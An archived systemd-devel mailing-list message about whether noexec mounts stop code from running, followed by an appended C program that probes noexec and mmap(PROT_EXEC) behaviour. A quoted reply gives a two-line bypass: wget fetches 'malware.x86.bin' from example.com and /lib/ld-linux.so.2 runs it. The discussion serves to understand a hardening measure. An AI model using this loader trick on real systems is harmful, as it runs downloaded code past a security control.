[systemd-devel] Mount options of /var/run/users/<pid>

Reindl Harald h.reindl at thelounge.net
Mon Feb 16 11:40:00 PST 2015



On 16.02.2015 at 20:31, Mantas Mikulėnas wrote:
> On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
> <simon.mcvittie at collabora.co.uk>
> wrote:
>
>     wget http://example.com/malware.x86.bin
>     /lib/ld-linux.so.2 malware.x86.bin
>
>
> Pretty sure this no longer works; these days noexec prevents
> mmap(PROT_EXEC) as well

you should not assume when you can simply try it

frankly we mount most data-partitions noexec even if they contain 
cronjobs which get the full interpreter and the script path by intention

[root at arrakis:~]$ mount | grep dune
/dev/sdf1 on /Volumes/dune type ext4 (rw,noexec,noatime,nodiratime,commit=30,inode_readahead_blks=16)
[root at arrakis:~]$ touch /Volumes/dune/test.sh
[root at arrakis:~]$ echo "ls /boot/" > /Volumes/dune/test.sh
[root at arrakis:~]$ bash /Volumes/dune/test.sh
config-3.18.7-100.fc20.x86_64  grub2 
initramfs-3.18.7-100.fc20.x86_64.img  initrd-plymouth.img  lost+found 
System.map-3.18.7-100.fc20.x86_64  vmlinuz-3.18.7-100.fc20.x86_64
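
To test the mmap(PROT_EXEC) question from this thread directly, here is an added example (not part of the original message or of systemd) that reads a file's mount flags with fstatvfs() and attempts mmap() with and without PROT_EXEC. The names probe_noexec, try_map and struct noexec_probe are made up for this example, and the fallback value 8 for ST_NOEXEC assumes Linux.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/statvfs.h>
#include <unistd.h>
/* glibc exposes ST_NOEXEC only under _GNU_SOURCE; 8 is the Linux MS_NOEXEC bit. */
#ifndef ST_NOEXEC
#define ST_NOEXEC 8
#endif
/* Hypothetical result type for this example; errno fields are 0 on success. */
struct noexec_probe {
    int noexec;         /* 1 if the mount holding the file has noexec set */
    int map_read_errno; /* mmap(PROT_READ): plain data access */
    int map_exec_errno; /* mmap(PROT_READ|PROT_EXEC): what a loader needs */
};

/* Attempt a one-byte private mapping; return 0 or the errno from mmap(). */
static int try_map(int fd, int prot) {
    void *p = mmap(NULL, 1, prot, MAP_PRIVATE, fd, 0);
    if (p == MAP_FAILED)
        return errno;
    munmap(p, 1);
    return 0;
}

/* Fill *out for a readable file; returns 0, or -1 if it cannot be examined. */
int probe_noexec(const char *path, struct noexec_probe *out) {
    struct statvfs vfs;
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    int rc = fstatvfs(fd, &vfs);
    if (rc == 0) {
        out->noexec = (vfs.f_flag & ST_NOEXEC) != 0;
        out->map_read_errno = try_map(fd, PROT_READ);
        out->map_exec_errno = try_map(fd, PROT_READ | PROT_EXEC);
    }
    close(fd);
    return rc;
}

int main(int argc, char **argv) {
    struct noexec_probe r;
    if (argc != 2 || probe_noexec(argv[1], &r) != 0)
        return 2; /* usage: prog READABLE_FILE */
    printf("noexec=%d read=%d exec=%d\n", r.noexec, r.map_read_errno, r.map_exec_errno);
    return 0;
}
```

mmap(2) documents EPERM for a PROT_EXEC request on a file from a filesystem mounted no-exec, so on such a mount the exec field should print that errno while the read field stays 0. The read-only mapping succeeding is the same reason `bash /Volumes/dune/test.sh` works: the interpreter only reads the script.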
